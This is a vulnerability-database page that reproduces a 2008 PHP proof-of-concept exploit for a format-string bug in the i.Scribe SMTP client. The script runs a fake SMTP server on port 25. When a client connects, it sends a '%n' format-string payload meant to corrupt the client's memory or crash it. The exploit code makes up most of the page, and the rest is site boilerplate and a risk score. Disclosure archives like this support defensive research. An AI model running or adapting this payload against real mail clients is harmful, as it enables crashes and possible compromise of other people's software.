Lucene search
K

i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 19 Views

i.Scribe SMTP Client Format String Remote Po

Code

                                                &#60;?php 
//I dont have c lol
/*___=++++++++++++__=--=________*****
 0-- 
  --  i.Scribe smtp client v 1.88 to 2.00 beta
      Format String (wscanf) bug p0c
      vendor : Memecode Software 
      grTs;SiD.psycho 
      A.Luja 27.11.08  

--)(________++++++++++++++++++++---*** 

___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==
          Or just open nc -l -p 25 lol*/
$host= $_SERVER[SERVER_ADDR];
$port= 25;
$ret = &#34;AAAA%n%n%n%n%n%n%n%n%n&#34;;
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die (&#34;socket error\n&#34;); 
$bind = socket_bind ($socket, $host, $port) or die (&#34;bind error\n&#34;); 
$listen = socket_listen($socket,1) or die(&#34;listen error\n&#34;);
printf(&#34;--==Fake smtp server ready==----\n&#34;);
printf(&#34;Now connect here witch iScribe client\n&#34;);
if(($acp=socket_accept($socket))!==false){
    printf(&#34;Target connected\n&#34;);
    sleep(2);
    printf(&#34;send evil char\n&#34;);
    $hello=socket_write($acp,$ret,strlen($ret));  
    printf(&#34;done\n&#34;);
    socket_close($acp);
}
socket_close($socket);
exit();
?&#62;

//Alfons Luja

# milw0rm.com [2008-11-27]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
19